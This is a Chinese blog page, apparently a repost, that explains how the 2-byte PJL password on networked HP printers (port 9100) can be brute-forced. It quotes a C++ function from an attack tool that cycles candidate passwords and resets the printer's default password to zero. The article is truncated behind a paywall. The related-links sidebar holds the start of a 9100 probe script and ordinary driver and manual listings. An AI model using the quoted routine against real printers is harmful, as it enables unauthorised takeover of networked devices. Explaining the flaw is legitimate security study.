打印机PCL漏洞原理分析

最新推荐文章于 2020-12-22 14:55:45 发布
最新推荐文章于 2020-12-22 14:55:45 发布
阅读量3.1k 收藏 3
点赞数
原文链接:http://www.cnblogs.com/anka9080/p/5235622.html
版权

0x01 漏洞概要

PCL代表打印机控制语言(Printer Control Language),由惠普公司开发,并被广泛使用的一种打印机协议。关于另一种页面描述语言,应该提一提由Adobe设计的PostScript(PS),它可以将更为复杂的事情交由绘图仪/打印机处理。PJL (Printer Job Language,打印机作业语言)作为PCL的扩展,用于指导打印机行为,比如更改设备设置、传输文件等。 若打印机的9100端口向公网开启,在向打印机发送PJL指令之前需要对使用者的身份进行认证,认证程序的密钥长度为2字节(Byte),因此可以通过暴力破解认证密钥想打印机发送PJL指令,最终导致任意命令的执行。

PJL (Printer Job Language)程序用于告诉打印机执行什么动作,是对PCL的额外支持。 PJL (Printer Job Language) 用于规范格式化页面的基本语言。本身是无害的,但却成为大多数解析器和解释器的漏洞利用代码。

0x02 漏洞原理

打印机系统9100端口开启时,若连上该端口通过PJL指令发送设备名称请求并得到打印机的响应,说明可以未授权访问打印机,PJL保护机制的密钥由2个字节(16比特)的存储单位存储,可以进行暴力破解攻击,从而得到目标打印机的完全访问权限。

根据国外安全研究员PHENOELIT 已经写好了漏洞利用程序,对其中的主要代码进行分析,得到下面的流程图

流程图

下面是破解密钥部分的代码:

  • 在pjlsession.cpp中的230到256行

 

 

void PJLsession::blind_disable_pjl_password(unsigned int pass) {
	    String	ts;
	    char numb[50];
	    if ((pass==0)||(pass>65535)) throw ExInvalid();#ifndef UNIX
	    _snprintf(numb,49,"%u",pass);#else
	    snprintf(numb,49,"%u",pass);#endif //UNIX
	    connection.clear();
	    connection.sendbuf.set(PJL_START);
	    connection.sendbuf.append("\r\n");
	    connection.sendbuf.append("@PJL JOB PASSWORD=");
	    connection.sendbuf.append(numb);
	    connection.sendbuf.append("\r\n@PJL DEFAULT PASSWORD=0 \r\n");
	    connection.sendbuf.append("@PJL EOJ\r\n");
	    connection.sendbuf.append(PJL_FINISH);
	    connection.senddata();
	    // TEST !!!
	    // connection.recvatleast(9,ctimeout);
	    // end TEST
	    connection.sendbuf.clear();
	}

因为打印机所使用的密码长度只有2个字节,即16个bit, 65535中表示方法,所以密码范围在0到65535之间,这就是为什么程序能暴力破解打印机认证密码。

 

connec

最低0.47元/天 解锁文章
weixin_30710457
关注
PCL中三维特征的工作原理
machismo的博客
05-21 406
1.输入点云 因为几乎所有的PCL类都是继承自基类pcl::PCLBase,pcl::Feature类以两种不同的方式接受输入数据: 一个完整的点云数据集,通过setInputCloud(PointCloudConstPtr &)给出-此函数必须设置后续特征算子此能正常计算。任何可以进行特征描述子估计的类,为给定的输入点云中的每个点估计一个特征向量。 点云数据集的一个子集,通过setInputCloud(PointCloudConstPtr &)和setIndices(IndicesCon
PJL命令详解
qq_34934140的博客
03-28 6644
PJL(Printer Job Language)是一种打印机命令语言,是一种控制打印机行为的命令语言,用于在打印作业中控制打印机的状态,并向打印机发送指令。
笔记:PJL的一些用法
hunter
12-22 4284
https://serverfault.com/questions/883772/how-to-read-out-the-service-id-and-model-number-from-hp-printers-via-pjl
PCL打印语言初步了解
热门推荐
打印/传真嵌入式开发--张志龙的专栏
07-30 1万+
一、 概述。这一章节简单描述PCL语言的来源、演变,以及它的功能和目的。二、 打印基础知识。这一章节介绍打印开发所需要的基础知识,专
Ricoh理光打印机PCL6通用驱动程序v4.2.0.0版64bit
08-06
Ricoh理光打印机PCL6通用驱动4.2.0.0版For Win2003-64/Win2008-64Win2012-64/WinXP-64/Vista-64/Win7-64/Win8-64/Win8.1-64(2014年3月7日发布)理光最新的通用打印机PCL6驱动,包含大量的理光打印机设备。...
理光打印机pcl6通用驱动程序 v4.2.0.0 官方最新版
07-05
理光打印机pcl6通用驱动是一款比较普遍使用的理光打印机驱动程序,正是因为这种类型的打印机用户使用的比较多,所以问题也就会随之增多,而这款驱动就能帮助用户找到各种可能存在的问题,让打印机性能变的更加卓越,...
Ricoh理光打印机PCL6通用驱动程序v4.2.0.0版32bit
08-06
Ricoh理光打印机PCL6通用驱动4.2.0.0版For Win2003-32/Win2008-32Win2012-32/WinXP-32/Vista-32/Win7-32/Win8-32/Win8.1-32(2014年3月7日发布)理光最新的通用打印机PCL6驱动,包含大量的理光打印机设备。...
PCL-example.rar_PCL example_PCL 打印机_PCL实例_pcl printer
09-21
这样的例子通常会演示如何创建简单的文本输出、图形绘制或者页面布局,帮助理解PCL语言的工作原理和语法结构。 根据【标签】"pcl_example"、"pcl_打印机"、"pcl实例"和"pcl__printer",我们可以推断这个压缩包中的...
HP PCL/PJL Reference
10-28
This manual describes the PCL 5 printer language. This includes descriptions of the commands available for Hewlett-Packard PCL 5 LaserJet printers and the basic requirements of PCL language programming.
简单打印实例-java关于PrinterJob的用法
12-14
0/获取打印服务对象(寻找打印机) 1/继承Printable实现接口方法print,以便打印机进行打印 2/用Graphics2D直接输出、用TextLayout直接输出、用lineBreaker输出多行文本
通过PJL协议,获取惠普USB打印机状态的C#演示代码
04-03
因项目需要通过程序获取打印机状态,但网上找到的都是通过windows API获取的,但前提条件是能打开打印机设置中的“双向通讯”,但我的打印机设置是灰的,怎么安装驱动都没有用,估计根本不支持,所以只能采用其他办法了。使用Printer Job Language协议,获取USB打印机缺纸状态的C#demo,另外附上了Printer Job Language协议。其他状态如卡纸,缺墨等状态根据协议不难获得。
打印机PCL_PJL手册
03-23
打印机PCL_PJL手册, 打印机协议参考手册
打印机PJL参数部分设定
07-19
实测可以用的部分PJL参数
printer: PJL
hunter
12-22 764
fk g…f,w: http://www.undocprint.org/formats/printer_control_languages/pjl −Table of Contents PJL - HP Printer Job Language Reference Undocumented PJL PJL - HP Printer Job Language PJL was developed by Hewlett-Packard to provide a method for switching prin
hp_jetdirect 9100漏洞检测
weixin_30757793的博客
06-19 2009
#-*-coding=utf8-*- import socket import sys def main(): if len(sys.argv)<=1: print('Parameters error') return s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) ...
C#获取打印机状态的问题
爱的不落叶
05-04 1万+
<br />windows的API获取:<br />public static string GetPrinterStatus(string PrinterName)  <br />  {  <br />  int intValue = GetPrinterStatusInt(PrinterName);  <br />  string strRet = string.Empty;  <br />  switch (intValue)  <br />  {  <br />  case 0:  <br /> 
惠普打印机PCL命令
最新发布
06-06
PCL(Printer Control Language)是惠普打印机的标准打印语言,它是一种用于控制打印机的命令语言。通过PCL命令,您可以控制打印机的行为,例如选择纸张类型、设置页边距、更改字体大小等等。 以下是几个常用的PCL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值